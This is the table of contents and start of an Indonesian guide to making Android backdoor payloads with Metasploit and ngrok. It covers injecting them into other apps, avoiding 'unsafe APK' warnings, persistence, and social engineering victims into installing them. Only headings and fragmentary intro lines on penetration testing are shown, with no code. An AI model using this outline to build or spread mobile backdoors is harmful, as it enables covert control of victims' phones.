PENGENALAN NGROK ............................................................................................................ 27

APA ITU NGROK ? ................................................................................................................. 27

BAGAIMANA CARA KERJA NGROK ? .............................................................................. 28

DOWNLOAD DAN CARA INSTALL NGROK .................................................................... 29

SETTING NGROK ................................................................................................................... 30

PEMBUATAN PAYLOAD BACKDOOR ANDROID ............................................................... 32

APA ITU PAYLOAD ? ............................................................................................................ 32

APA ITU BACKDOOR ? ......................................................................................................... 32

APA YANG BISA KITA LAKUKAN KETIKA KITA BERHASIL MENYISIPKAN

BAGAIMANA CARA MEMBUAT PAYLOAD YANG BERISI BACKDOOR ?................ 34

PENGGUNAAN METASPLOIT UNTUK MENDAPATKAN AKSES BACKDOOR MELALUI

BAGAIMANA MENDAPATKAN AKSES BACKDOOR YANG KITA BUAT ? ............... 37

PENGGUNAAN METASPLOIT DAN NGROK ........................................................................ 43

UNTUK MENDAPATKAN AKSES MELALUI INTERNET ................................................... 43

BAGAIMANA MENDAPATKAN AKSES BACKDOOR KITA MELALUI INTERNET ? 43

HAL YANG BISA DILAKUKAN SETELAH MENDAPATKAN AKSES BACKDOOR ....... 48

APA SAJA YANG BISA DILAKUKAN KETIKA KITA BERHASIL MENDAPATKAN

BEBERAPA CONTOH PENGGUNAAN ............................................................................... 55

INJECTING BACKDOOR PAYLOAD KEDALAM APLIKASI ANDROID LAIN ................ 59

KENAPA KITA HARUS MENGINJECTKAN PAYLOAD KITA KE APLIKASI LAIN ? . 59

HAL HAL YANG DIBUTUHKAN SEBELUM INJECTING PAYLOAD ............................ 59

BAGAIMANA CARA MELAKUKAN INJECTING PAYLOAD KE APLIKASI ANDROID

BAGAIMANA SEBENARNYA CARA KERJA PROSES INJECTING PAYLOAD ? ........ 66

MENGATASI APK TERDETEKSI TIDAK AMAN UNTUK DIINSTAL ................................ 71

MENGAPA APK YANG KITA BUAT TERDETEKSI TIDAK AMAN ? ............................ 71

BAGAIMANA CARA MELAKUKAN SIGNING SECARA MANUAL ? ........................... 72

MEMBUAT PERSISTANCE BACKDOOR ............................................................................... 77

APA ITU PERSISTENCE BACKDOOR ? .............................................................................. 77

BAGAIMANA CARA MEMBUAT PERSISTENCE BACKDOOR ? ................................... 78

SOCIAL ENGINERING AGAR TARGET MENGINSTALL PAYLOAD ................................ 82

APA ITU SOCIAL ENGINERING ? ....................................................................................... 82

METODE SOCIAL ENGINERING ......................................................................................... 83

DAFTAR PUSTAKA ................................................................................................................... 85

APA ITU PENETRATION TESTING ?

Pengertian Penetration Testing adalah suatu kegiatan dimana seseorang mencoba

Tujuan Penetration Testing diantaranya adalah untuk menentukan dan mengetahui

APA SAJA LANGKAH – LANGKAH DALAM PENETRATION TESTING ?

Langkah-langkah dalam Penetration Testing:

APA HUBUNGAN PENETRATION TESTING DENGAN TUTORIAL PADA BUKU ?

Penciptaan proyek yang paling terkenal adalah Metasploit Framework. Metasploit

Berikut ini adalah beberapa jenis metasploit sebagai berikut: